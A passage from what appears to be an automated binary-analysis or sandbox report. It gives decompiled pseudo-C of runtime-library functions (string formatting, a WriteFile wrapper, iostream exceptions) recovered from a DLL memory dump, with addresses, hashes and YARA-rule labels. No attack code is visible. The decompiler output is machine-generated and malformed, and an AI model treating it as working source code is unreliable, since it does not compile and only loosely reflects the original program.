										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = E6D4C4956(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E6D4C4B4A(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E6D47AAFA(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E6D4C1817(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E6D490FA0();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}

0x6d4b98fe
0x6d4b9906
0x6d4b990d
0x6d4b9913
0x6d4b9916
0x6d4b991d
0x6d4b9920
0x6d4b9926
0x6d4b9929
0x6d4b992d
0x6d4b9930
0x6d4b9934
0x6d4b9937
0x6d4b994e
0x6d4b9939
0x6d4b993c
0x6d4b9946
0x6d4b993e
0x6d4b993e
0x6d4b993e
0x6d4b993c
0x6d4b995b
0x00000000
0x6d4b9961
0x6d4b996a
0x6d4b9971
0x6d4b997b
0x6d4b997e
0x6d4b9986
0x6d4b998e
0x6d4b9996
0x6d4b999d
0x6d4b99a3
0x6d4b99aa
0x6d4b99ac
0x6d4b99c2
0x6d4b99d0
0x6d4b99ae
0x6d4b99bb
0x6d4b99bb
0x6d4b99d5
0x6d4b99d9
0x00000000
0x6d4b99df
0x6d4b99df
0x6d4b99e2
0x6d4b99e7
0x6d4b99eb
0x6d4b9a45
0x6d4b9a45
0x6d4b9a47
0x6d4b9a47
0x6d4b9a4c
0x6d4b9acc
0x6d4b9ace
0x6d4b9ad3
0x6d4b9d4a
0x6d4b9d4a
0x6d4b9d4a
0x6d4b9d4d
0x6d4b9d50
0x00000000
0x00000000
0x6d4b9adc
0x6d4b9adf
0x6d4b9ab6
0x6d4b9ab8
0x6d4b9acb
0x6d4b9acb
0x6d4b9ae1
0x6d4b9ae5
0x6d4b9ae5
0x6d4b9ae7
0x6d4b9aea
0x6d4b9aec
0x6d4b9aef
0x6d4b9aef
0x6d4b9af2
0x6d4b9af3
0x6d4b9af3
0x6d4b9af8
0x6d4b9afb
0x6d4b9afe
0x6d4b9b01
0x6d4b9b04
0x6d4b9c39
0x6d4b9c39
0x6d4b9c3c
0x6d4b9d09
0x6d4b9d09
0x6d4b9d0c
0x6d4b9d25
0x6d4b9d29
0x6d4b9d29
0x6d4b9d2b
0x6d4b9d2b
0x6d4b9d3b
0x6d4b9d40
0x6d4b9d43
0x6d4b9d45
0x6d4b9d60
0x00000000
0x6d4b9d66
0x6d4b9d47
0x6d4b9d47
0x00000000
0x6d4b9d47
0x6d4b9d0e
0x6d4b9d0e
0x6d4b9d11
0x00000000
0x00000000
0x6d4b9d13
0x6d4b9d13
0x6d4b9d16
0x6d4b9d1b
0x6d4b9d1e
0x6d4b9d21
0x00000000
0x6d4b9d21
0x6d4b9c42
0x6d4b9c42
0x6d4b9c45
0x6d4b9cf5
0x6d4b9cf5
0x6d4b9cf8
0x6d4b9d01
0x6d4b9d05
0x6d4b9d05
0x00000000
0x6d4b9d05
0x6d4b9cfa
0x6d4b9cfa
0x6d4b9cfd
0x00000000
0x00000000
0x00000000
0x6d4b9cff
0x6d4b9c4b
0x6d4b9c4b
0x6d4b9c4e
0x6d4b9ce1
0x6d4b9ce1
0x6d4b9ce4
0x6d4b9ced
0x6d4b9cf1
0x6d4b9cf1
0x00000000
0x6d4b9cf1
0x6d4b9ce6
0x6d4b9ce6
0x6d4b9ce9
0x00000000
0x00000000
0x00000000
0x6d4b9ceb
0x6d4b9c54
0x6d4b9c54
0x6d4b9c57
0x6d4b9c80
0x6d4b9c83
0x6d4b9c87
0x6d4b9c91
0x6d4b9c89
0x6d4b9c89
0x6d4b9c89
0x6d4b9c97
0x6d4b9c9a
0x6d4b9cb6
0x6d4b9cb6
0x6d4b9cb9
0x6d4b9cbc
0x00000000
0x00000000
0x6d4b9cc2
0x6d4b9cc5
0x6d4b9cc5
0x6d4b9cc8
0x00000000
0x00000000
0x6d4b9ccc
0x6d4b9ccf
0x6d4b9cd2
0x6d4b9cd5
0x6d4b9cd7
0x6d4b9cda
0x6d4b9cdd
0x00000000
0x00000000
0x00000000
0x6d4b9cdf
0x6d4b9c9c
0x6d4b9c9c
0x6d4b9c9f
0x00000000
0x00000000
0x6d4b9ca1
0x6d4b9ca9
0x6d4b9cac
0x6d4b9caf
0x6d4b9caf
0x00000000
0x6d4b9c9a
0x6d4b9c59
0x6d4b9c5c
0x00000000
0x00000000
0x6d4b9c63
0x6d4b9c63
0x6d4b9c66
0x6d4b9c79
0x00000000
0x6d4b9c79
0x6d4b9c69
0x6d4b9c69
0x6d4b9c6c
0x00000000
0x00000000
0x6d4b9c72
0x00000000
0x6d4b9c72
0x6d4b9b0a
0x6d4b9c08
0x6d4b9c08
0x6d4b9c0b
0x6d4b9c2e
0x6d4b9c32
0x6d4b9c32
0x00000000
0x6d4b9c32
0x6d4b9c0d
0x6d4b9c0d
0x6d4b9c10
0x00000000
0x00000000
0x6d4b9c12
0x6d4b9c12
0x6d4b9c15
0x6d4b9c27
0x00000000
0x6d4b9c27
0x6d4b9c17
0x6d4b9c17
0x6d4b9c1a
0x00000000
0x00000000
0x6d4b9c20
0x00000000
0x6d4b9c20
0x6d4b9b10
0x6d4b9b13
0x6d4b9bb5
0x6d4b9bb5
0x6d4b9bba
0x6d4b9bc0
0x6d4b9bc0
0x6d4b9bc1
0x6d4b9bc4
0x6d4b9bca
0x6d4b9bcd
0x6d4b9bd0
0x00000000
0x00000000
0x6d4b9bd6
0x6d4b9bd9
0x6d4b9bd9
0x6d4b9bdc
0x00000000
0x00000000
0x6d4b9be4
0x6d4b9be5
0x6d4b9be8
0x6d4b9beb
0x00000000
0x00000000
0x6d4b9bf3
0x6d4b9bf6
0x6d4b9bf9
0x6d4b9bfb
0x6d4b9bfe
0x6d4b9c01
0x00000000
0x00000000
0x00000000
0x6d4b9c03
0x6d4b9bd9
0x00000000
0x6d4b9bc4
0x6d4b9b19
0x6d4b9b1c
0x6d4b9b31
0x6d4b9b37
0x6d4b9b3e
0x6d4b9b40
0x6d4b9b9b
0x6d4b9ba1
0x6d4b9ba2
0x6d4b9ba4
0x6d4b9ba9
0x6d4b9ba9
0x6d4b9b42
0x6d4b9b42
0x6d4b9b45
0x6d4b9b45
0x6d4b9bac
0x00000000
0x6d4b9bac
0x6d4b9b1e
0x6d4b9b21
0x6d4b9b7b
0x6d4b9b7b
0x6d4b9b7e
0x6d4b9b8a
0x6d4b9b8e
0x6d4b9b8e
0x00000000
0x6d4b9b8e
0x6d4b9b80
0x6d4b9b80
0x6d4b9b83
0x00000000
0x00000000
0x00000000
0x6d4b9b85
0x6d4b9b23
0x6d4b9b26
0x6d4b9b4a
0x6d4b9b4a
0x6d4b9b4d
0x6d4b9b70
0x6d4b9b74
0x6d4b9b74
0x00000000
0x6d4b9b74
0x6d4b9b4f
0x6d4b9b4f
0x6d4b9b52
0x00000000
0x00000000
0x6d4b9b54
0x6d4b9b54
0x6d4b9b57
0x6d4b9b69
0x00000000
0x6d4b9b69
0x6d4b9b59
0x6d4b9b59
0x6d4b9b5c
0x00000000
0x00000000
0x6d4b9b62
0x00000000
0x6d4b9b62
0x6d4b9b28
0x6d4b9b2b
0x00000000
0x00000000
0x00000000
0x6d4b9b2b
0x00000000
0x6d4b9d56
0x6d4b9a4e
0x6d4b9a55
0x6d4b9a7e
0x6d4b9a57
0x6d4b9a66
0x6d4b9a66
0x6d4b9a85
0x6d4b9a87
0x6d4b9a8a
0x6d4b9aaf
0x6d4b9ab0
0x00000000
0x6d4b9a8c
0x6d4b9a8c
0x6d4b9a8f
0x6d4b9a92
0x6d4b9a99
0x6d4b9a9c
0x6d4b9a9f
0x6d4b9aa2
0x6d4b9aa5
0x6d4b9aa7
0x6d4b9aaa
0x00000000
0x00000000
0x00000000
0x6d4b9aaa
0x6d4b9aac
0x00000000
0x6d4b9aac
0x6d4b9a8a
0x6d4b99f2
0x6d4b99f4
0x6d4b99f6
0x6d4b99fe
0x6d4b9a23
0x6d4b9a25
0x6d4b9a2f
0x6d4b9a31
0x6d4b9a34
0x6d4b9a35
0x6d4b9a37
0x00000000
0x00000000
0x6d4b9a3d
0x6d4b9a1e
0x6d4b9a1e
0x00000000
0x6d4b9a1e
0x6d4b9a02
0x6d4b9a06
0x6d4b9a0b
0x6d4b9a0d
0x6d4b9a12
0x00000000
0x00000000
0x6d4b9a18
0x00000000
0x6d4b9a18
0x6d4b99d9

APIs

__freea.LIBCMT ref: 6D4B9AB0
__freea.LIBCMT ref: 6D4B9ACE

Strings

am/pm, xrefs: 6D4B9B31
a/p, xrefs: 6D4B9B95

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 35bdbf5679abd337143475f2df6cc80331127d5b81089857097e29bad9d4b78d
Instruction ID: 48e98db90652afe0505820be9fa2337e743f55907a3ff0552a26e73935940f32
Opcode Fuzzy Hash: 35bdbf5679abd337143475f2df6cc80331127d5b81089857097e29bad9d4b78d
Instruction Fuzzy Hash: AAD1EE319142878BDB158F69C890FBABBB4FF3A310F208159E915AB354D3769D81CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2A87, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6D4C2A87(void* __ebx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr _t112;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				void* _t129;
				void* _t134;

				_t134 = __fp0;
				_t62 =  *0x6d534074; // 0x286e79ba
				_v8 = _t62 ^ _t128;
				_t110 = _a12;
				_v12 = _t110;
				_t124 = _a4;
				_t121 = _a8;
				_v52 = _t121;
				if(_t110 != 0) {
					__eflags = _t121;
					if(_t121 != 0) {
						_push(__ebx);
						_t106 = _t124 >> 6;
						_t119 = (_t124 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0x6d540738 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t119;
						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t110;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E6D4C17FC(_t124, 0, 0, 2);
									_t129 = _t129 + 0x10;
								}
								_t69 = E6D4C262C(_t107, _t119, __eflags, _t134, _t124);
								__eflags = _t69;
								if(_t69 == 0) {
									_t25 =  &_v32; // 0x6d4b3c4c
									_t112 =  *((intOrPtr*)(0x6d540738 +  *_t25 * 4));
									_t71 = _v28;
									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										E6D4C26A2(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t89 = E6D4C286F(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t89 = E6D4C2781(_t107, _t121, _t124,  &_v24, _t124, _t121, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t89 = E6D4C240C(_t107, _t121, _t124, _t134,  &_v24, _t124, _t121, _v12);
										L17:
										L15:
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											L41:
											return E6D4903E3(_v8 ^ _t128);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t121 = _v52;
											L34:
											_t117 = _v28;
											_t79 =  *((intOrPtr*)(0x6d540738 + _v32 * 4));
											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E6D4B41F9())) = 0x1c;
												_t81 = E6D4B41E6();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t121 - 0x1a;
											if( *_t121 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t126 = 5;
										__eflags = _t77 - _t126;
										if(_t77 != _t126) {
											_t81 = E6D4B41C3(_t77);
										} else {
											 *((intOrPtr*)(E6D4B41F9())) = 9;
											 *(E6D4B41E6()) = _t126;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									E6D4C25BF( &_v24, _t121, _v12);
									goto L15;
								}
							}
							 *(E6D4B41E6()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E6D4B41F9())) = 0x16;
							_t81 = E6D4B40C8();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E6D4B41E6()) =  *_t99 & _t121;
					 *((intOrPtr*)(E6D4B41F9())) = 0x16;
					E6D4B40C8();
					goto L41;
				}
				goto L41;
			}

0x6d4c2a87
0x6d4c2a8f
0x6d4c2a96
0x6d4c2a99
0x6d4c2a9c
0x6d4c2aa0
0x6d4c2aa4
0x6d4c2aa7
0x6d4c2aac
0x6d4c2ab5
0x6d4c2ab7
0x6d4c2ad8
0x6d4c2add
0x6d4c2ae3
0x6d4c2ae6
0x6d4c2ae9
0x6d4c2af0
0x6d4c2af3
0x6d4c2af6
0x6d4c2afa
0x6d4c2afd
0x6d4c2b04
0x6d4c2b06
0x6d4c2b08
0x6d4c2b0a
0x6d4c2b29
0x6d4c2b2c
0x6d4c2b2c
0x6d4c2b31
0x6d4c2b3a
0x6d4c2b3f
0x6d4c2b3f
0x6d4c2b43
0x6d4c2b49
0x6d4c2b4b
0x6d4c2b86
0x6d4c2b89
0x6d4c2b90
0x6d4c2b93
0x6d4c2b98
0x6d4c2be7
0x6d4c2bea
0x6d4c2bed
0x6d4c2bf9
0x6d4c2bff
0x6d4c2c01
0x6d4c2c09
0x6d4c2c09
0x00000000
0x6d4c2c0c
0x6d4c2b9d
0x6d4c2b9d
0x6d4c2ba0
0x6d4c2bd9
0x00000000
0x6d4c2bd9
0x6d4c2ba2
0x6d4c2ba2
0x6d4c2ba5
0x6d4c2bc9
0x00000000
0x6d4c2bc9
0x6d4c2ba7
0x6d4c2baa
0x00000000
0x00000000
0x6d4c2bb9
0x00000000
0x6d4c2b4d
0x6d4c2b4d
0x6d4c2b4f
0x6d4c2b7c
0x6d4c2b81
0x6d4c2b6c
0x6d4c2c0f
0x6d4c2c12
0x6d4c2c13
0x6d4c2c14
0x6d4c2c15
0x6d4c2c18
0x6d4c2c1a
0x6d4c2c7f
0x6d4c2c82
0x6d4c2c83
0x6d4c2c92
0x6d4c2c92
0x6d4c2c1c
0x6d4c2c1f
0x6d4c2c21
0x6d4c2c47
0x6d4c2c4a
0x6d4c2c4d
0x6d4c2c50
0x6d4c2c57
0x6d4c2c5c
0x6d4c2c67
0x6d4c2c6c
0x6d4c2c72
0x6d4c2c77
0x6d4c2c77
0x6d4c2c7a
0x00000000
0x6d4c2c7a
0x6d4c2c5e
0x6d4c2c61
0x00000000
0x00000000
0x00000000
0x6d4c2c63
0x6d4c2c25
0x6d4c2c26
0x6d4c2c28
0x6d4c2c3f
0x6d4c2c2a
0x6d4c2c2f
0x6d4c2c3a
0x6d4c2c3a
0x00000000
0x6d4c2c28
0x6d4c2b53
0x6d4c2b56
0x00000000
0x00000000
0x6d4c2b64
0x00000000
0x6d4c2b69
0x6d4c2b4b
0x6d4c2b11
0x6d4c2b19
0x6d4c2b1f
0x00000000
0x6d4c2b1f
0x6d4c2aff
0x6d4c2b02
0x00000000
0x00000000
0x00000000
0x6d4c2b02
0x6d4c2abe
0x6d4c2ac5
0x6d4c2acb
0x00000000
0x6d4c2ad0
0x00000000

Strings

L<Km, xrefs: 6D4C2B86

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: L<Km
API String ID: 0-4252610374
Opcode ID: 742ef1c9eb889bb90afcf8e5ed4cbb2d365dee05295a2e767de8c5f91f338334
Instruction ID: 527e53a791ee1cc964f81fa84e191f59de085f45ab9be425f9c54236223fa4f7
Opcode Fuzzy Hash: 742ef1c9eb889bb90afcf8e5ed4cbb2d365dee05295a2e767de8c5f91f338334
Instruction Fuzzy Hash: 8651B879D5820A9FDF21CFA9C884FAE7BB4BF16314F115149E514A7250DFB09D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D453C40, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E6D453C40(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __fp0, char _a4, intOrPtr* _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v44;
				intOrPtr* _v48;
				intOrPtr* _v52;
				signed int _v72;
				char _v100;
				char _v108;
				signed int _t43;
				signed int _t44;
				intOrPtr* _t46;
				intOrPtr _t48;
				intOrPtr _t54;
				signed int _t60;
				void* _t63;
				intOrPtr _t70;
				intOrPtr* _t73;
				intOrPtr _t81;
				signed char _t83;
				char* _t84;
				intOrPtr _t86;
				void* _t87;
				intOrPtr _t89;
				char* _t96;
				signed int _t98;
				signed int _t102;
				void* _t116;

				_t116 = __fp0;
				_t98 = _t102;
				_push(0xffffffff);
				_push(E6D4FAB48);
				_push( *[fs:0x0]);
				_t43 =  *0x6d534074; // 0x286e79ba
				_t44 = _t43 ^ _t98;
				_v20 = _t44;
				_push(__ebx);
				_push(__edi);
				_push(_t44);
				 *[fs:0x0] =  &_v16;
				_t92 = __ecx;
				_v48 = __ecx;
				_t46 = _a8;
				_t85 = _a4;
				_t73 = _a4;
				_v52 = __ecx;
				_v28 = 0;
				_t89 =  *_t46;
				_t8 = _t46 + 4; // 0x24448d6d
				_t70 =  *_t8;
				_v24 = 0;
				_v28 = 0;
				_v24 = 0xf;
				_v44 = 0;
				_v48 = _t73 + 1;
				do {
					_t48 =  *_t73;
					_t73 = _t73 + 1;
				} while (_t48 != 0);
				E6D457F00(_t70,  &_v44, _t85, _t98, _t85, _t73 - _v48);
				_v8 = 0;
				_push( &_v44);
				_push(_t70);
				E6D4535C0(_t70, __ecx, _t89, _t89);
				_v8 = 2;
				_t86 = _v24;
				if(_t86 < 0x10) {
					L6:
					_v28 = 0;
					_v24 = 0xf;
					_v44 = 0;
					 *_t92 = 0x6d5002a8;
					_v8 = 3;
					 *_t92 = 0x6d5003a8;
					_v8 = 0xffffffff;
					 *[fs:0x0] = _v16;
					return E6D4903E3(_v20 ^ _t98);
				} else {
					_t81 = _v44;
					_t87 = _t86 + 1;
					_t54 = _t81;
					if(_t87 < 0x1000) {
						L5:
						_push(_t87);
						E6D490AE3(_t81);
						goto L6;
					} else {
						_t81 =  *((intOrPtr*)(_t81 - 4));
						_t87 = _t87 + 0x23;
						if(_t54 - _t81 + 0xfffffffc > 0x1f) {
							E6D4B40D8(_t70, _t81, _t87, _t89, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t98);
							_t60 = _v72 & 0x00000017;
							 *(_t81 + 0xc) = _t60;
							_push(__ecx);
							_t83 =  *(_t81 + 0x10) & _t60;
							__eflags = _t83;
							if(_t83 == 0) {
								return _t60;
							} else {
								__eflags = _a4;
								if(_a4 != 0) {
									E6D4924F4(0, 0);
								}
								__eflags = _t83 & 0x00000004;
								if((_t83 & 0x00000004) == 0) {
									__eflags = _t83 & 0x00000002;
									_t96 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
								} else {
									_t96 = "ios_base::badbit set";
								}
								_t63 = E6D4533A0(_t70, _t87, _t89, _t116,  &_v108, 1);
								_t84 =  &_v100;
								E6D453C40(_t70, _t84, _t89, _t96, _t116, _t96, _t63);
								E6D4924F4( &_v108, 0x6d532a30);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								return  *((intOrPtr*)(_t84 + 0xc));
							}
						} else {
							goto L5;
						}
					}
				}
			}

0x6d453c40
0x6d453c41
0x6d453c43
0x6d453c45
0x6d453c50
0x6d453c54
0x6d453c59
0x6d453c5b
0x6d453c5e
0x6d453c60
0x6d453c61
0x6d453c65
0x6d453c6b
0x6d453c6d
0x6d453c70
0x6d453c73
0x6d453c76
0x6d453c78
0x6d453c7b
0x6d453c82
0x6d453c84
0x6d453c84
0x6d453c8a
0x6d453c91
0x6d453c98
0x6d453c9f
0x6d453ca3
0x6d453ca6
0x6d453ca6
0x6d453ca8
0x6d453ca9
0x6d453cb5
0x6d453cba
0x6d453cc4
0x6d453cc5
0x6d453cc9
0x6d453cce
0x6d453cd2
0x6d453cd8
0x6d453d02
0x6d453d02
0x6d453d09
0x6d453d10
0x6d453d14
0x6d453d1a
0x6d453d21
0x6d453d27
0x6d453d33
0x6d453d4b
0x6d453cda
0x6d453cda
0x6d453cdd
0x6d453cde
0x6d453ce6
0x6d453cf8
0x6d453cf8
0x6d453cfa
0x00000000
0x6d453ce8
0x6d453ce8
0x6d453ceb
0x6d453cf6
0x6d453d4e
0x6d453d53
0x6d453d54
0x6d453d55
0x6d453d56
0x6d453d57
0x6d453d58
0x6d453d59
0x6d453d5a
0x6d453d5b
0x6d453d5c
0x6d453d5d
0x6d453d5e
0x6d453d5f
0x6d453d60
0x6d453d6c
0x6d453d6f
0x6d453d75
0x6d453d76
0x6d453d76
0x6d453d78
0x6d453d86
0x6d453d7a
0x6d453d7a
0x6d453d7e
0x6d453d8d
0x6d453d8d
0x6d453d92
0x6d453d95
0x6d453d9e
0x6d453dab
0x6d453d97
0x6d453d97
0x6d453d97
0x6d453db5
0x6d453dbd
0x6d453dc3
0x6d453dd2
0x6d453dd7
0x6d453dd8
0x6d453dd9
0x6d453dda
0x6d453ddb
0x6d453ddc
0x6d453ddd
0x6d453dde
0x6d453ddf
0x6d453de3
0x6d453de3
0x00000000
0x00000000
0x00000000
0x6d453cf6
0x6d453ce6

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453D8D

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,6D479030,6D4D78BB,00000000,?,00000000,?,?,?,?,6D479030,6D4D78BB,6D5308C4,?,6D4D78BB), ref: 6D492554

__CxxThrowException@8.LIBVCRUNTIME ref: 6D453DD2

Strings

ios_base::badbit set, xrefs: 6D453D97, 6D453DC2
ios_base::failbit set, xrefs: 6D453C5F

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3476068407-1240500531
Opcode ID: 3c6981ca098cfa8813d494cc828ffb421df1c3ed5d55185f7296dbab589766f8
Instruction ID: bc3e35615c2b17c7f82419ee4bd69bd6d969ecc52baef788db02b096c0a55743
Opcode Fuzzy Hash: 3c6981ca098cfa8813d494cc828ffb421df1c3ed5d55185f7296dbab589766f8
Instruction Fuzzy Hash: A541E471904248AFDB04CFA8C848FEEBBB8EF49314F20811DE550AB381D7759E04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D460200, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E6D460200(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				signed short _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v40;
				intOrPtr _v44;
				char _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v108;
				char _v148;
				char _v196;
				void* __ebx;
				void* __ebp;
				signed int _t52;
				signed int _t53;
				void* _t57;
				void* _t61;
				signed int _t72;
				void* _t85;
				void* _t93;
				intOrPtr _t96;
				void* _t102;
				signed int _t105;
				void* _t116;

				_t91 = __edx;
				_t86 = __ecx;
				_t85 = _t102;
				_t105 = (_t102 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t85 + 4));
				_t100 = _t105;
				_push(0xffffffff);
				_push(0x6d4fc8a0);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(_t85);
				_t52 =  *0x6d534074; // 0x286e79ba
				_t53 = _t52 ^ _t105;
				_v40 = _t53;
				_push(__esi);
				_push(__edi);
				_push(_t53);
				 *[fs:0x0] =  &_v24;
				_v28 = _t105 - 0xa8;
				_t96 = __ecx;
				_v96 = __ecx;
				_t93 = E6D4B39AE(_t85, __edx, __fp0);
				_t57 = E6D47A6A8(_t116,  &_v148);
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x48], xmm0");
